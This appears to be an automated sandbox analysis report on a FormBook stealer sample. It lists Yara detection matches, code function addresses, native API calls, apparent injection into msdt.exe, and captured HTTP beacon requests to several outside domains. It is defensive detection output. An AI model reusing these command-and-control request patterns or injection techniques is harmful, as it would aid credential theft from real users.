          Source: global trafficHTTP traffic detected: GET /sh5d/?Yv=U9Dn+H6I1oLCGiFi1oW/bg7Rnic0zjRPtt9AMGb5MRiLdOF7LfbhYF1T4mwo8MTrEy0Q&8pZ=MFQX HTTP/1.1Host: www.arsels.infoConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /sh5d/?Yv=bH0MuGY0n47F1S4kOvzCBL0/mw6YL+7138CmEb6WqYz18csJYDgpNmReh/JvI3nBbY8S&8pZ=MFQX HTTP/1.1Host: www.electricatrick.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /sh5d/?Yv=Pdn0Hokg7Q3B7dDVtUX5QMohVVbqJZ0HrhWfxUy6sRCS+GjM4sZ5xKohcZ81Ep8iPYLe&8pZ=MFQX HTTP/1.1Host: www.vupeliquid.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 7.2.HkE0tD0g4NXKJfy.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.0.HkE0tD0g4NXKJfy.exe.400000.8.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.0.HkE0tD0g4NXKJfy.exe.400000.8.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.0.HkE0tD0g4NXKJfy.exe.400000.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.0.HkE0tD0g4NXKJfy.exe.400000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.0.HkE0tD0g4NXKJfy.exe.400000.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.2.HkE0tD0g4NXKJfy.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000007.00000002.346581658.0000000001450000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000000.323615980.000000000F7EA000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.346764994.0000000001880000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.346144380.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000002.554339019.0000000002D00000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000002.551703779.0000000000970000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000002.553715961.0000000002C00000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000000.289531768.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.292187512.000000000408D000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.292465648.00000000042A7000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000000.290051864.0000000000400000.00000040.00000001.sdmp, type: MEMORY

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 7.2.HkE0tD0g4NXKJfy.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 7.2.HkE0tD0g4NXKJfy.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 7.0.HkE0tD0g4NXKJfy.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 7.0.HkE0tD0g4NXKJfy.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 7.0.HkE0tD0g4NXKJfy.exe.400000.8.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 7.0.HkE0tD0g4NXKJfy.exe.400000.8.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 7.0.HkE0tD0g4NXKJfy.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 7.0.HkE0tD0g4NXKJfy.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 7.0.HkE0tD0g4NXKJfy.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 7.0.HkE0tD0g4NXKJfy.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 7.0.HkE0tD0g4NXKJfy.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 7.0.HkE0tD0g4NXKJfy.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 7.2.HkE0tD0g4NXKJfy.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 7.2.HkE0tD0g4NXKJfy.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.346581658.0000000001450000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.346581658.0000000001450000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000A.00000000.323615980.000000000F7EA000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000A.00000000.323615980.000000000F7EA000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.346764994.0000000001880000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.346764994.0000000001880000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.346144380.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.346144380.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000D.00000002.554339019.0000000002D00000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000D.00000002.554339019.0000000002D00000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000D.00000002.551703779.0000000000970000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000D.00000002.551703779.0000000000970000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000D.00000002.553715961.0000000002C00000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000D.00000002.553715961.0000000002C00000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000000.289531768.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000000.289531768.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.292187512.000000000408D000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.292187512.000000000408D000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.292465648.00000000042A7000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.292465648.00000000042A7000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000000.290051864.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000000.290051864.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: HkE0tD0g4NXKJfy.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: 7.2.HkE0tD0g4NXKJfy.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 7.2.HkE0tD0g4NXKJfy.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 7.0.HkE0tD0g4NXKJfy.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 7.0.HkE0tD0g4NXKJfy.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 7.0.HkE0tD0g4NXKJfy.exe.400000.8.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 7.0.HkE0tD0g4NXKJfy.exe.400000.8.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 7.0.HkE0tD0g4NXKJfy.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 7.0.HkE0tD0g4NXKJfy.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 7.0.HkE0tD0g4NXKJfy.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 7.0.HkE0tD0g4NXKJfy.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 7.0.HkE0tD0g4NXKJfy.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 7.0.HkE0tD0g4NXKJfy.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 7.2.HkE0tD0g4NXKJfy.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 7.2.HkE0tD0g4NXKJfy.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.346581658.0000000001450000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.346581658.0000000001450000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000A.00000000.323615980.000000000F7EA000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000A.00000000.323615980.000000000F7EA000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.346764994.0000000001880000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.346764994.0000000001880000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.346144380.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.346144380.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000D.00000002.554339019.0000000002D00000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000D.00000002.554339019.0000000002D00000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000D.00000002.551703779.0000000000970000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000D.00000002.551703779.0000000000970000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000D.00000002.553715961.0000000002C00000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000D.00000002.553715961.0000000002C00000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000000.289531768.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000000.289531768.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.292187512.000000000408D000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.292187512.000000000408D000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.292465648.00000000042A7000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.292465648.00000000042A7000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000000.290051864.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000000.290051864.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 0_2_00C15C24
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 0_2_013D8250
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 0_2_013DD2F8
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 0_2_013DD2E8
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_00401030
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_0041BA02
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_00408C7C
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_0041CC38
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_00408C80
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_0041C529
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_0041BD30
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_00402D87
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_00402D90
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_00402FB0
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_00E65C24
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_018EF900
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_01904120
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_018FB090
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_019120A0
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_019B20A8
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_019B28EC
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_019A1002
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_0191EBB0
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_019ADBD2
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_019B2B28
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_019B22AE
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_01912581
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_019B25DD
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_018FD5E0
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_019B2D07
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_018E0D20
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_019B1D55
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_018F841F
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_019AD466
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_019B1FF1
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_019B2EF7
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_019AD616
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_01906E30
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_047ED466
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_0473841F
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_047F1D55
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_04720D20
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_047F2D07
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_0473D5E0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_047F25DD
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_04752581
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_04746E30
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_047ED616
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_047F2EF7
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_047F1FF1
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_047E1002
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_047F28EC
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_047520A0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_047F20A8
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_0473B090
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_04744120
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_0472F900
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_047F22AE
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_047F2B28
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_047EDBD2
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_0475EBB0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_02D02FB0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_02D08C80
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_02D08C7C
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_02D1CC38
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_02D02D90
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_02D02D87
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: String function: 018EB150 appears 35 times
          Source: C:\Windows\SysWOW64\msdt.exeCode function: String function: 0472B150 appears 35 times
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_004185E0 NtCreateFile,
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_00418690 NtReadFile,
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_00418710 NtClose,
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_004187C0 NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_004185DA NtCreateFile,
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_0041873A NtReadFile,
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_004187BC NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_019299A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_01929910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_019298F0 NtReadVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_01929840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_01929860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_01929A00 NtProtectVirtualMemory,LdrInitializeThunk,
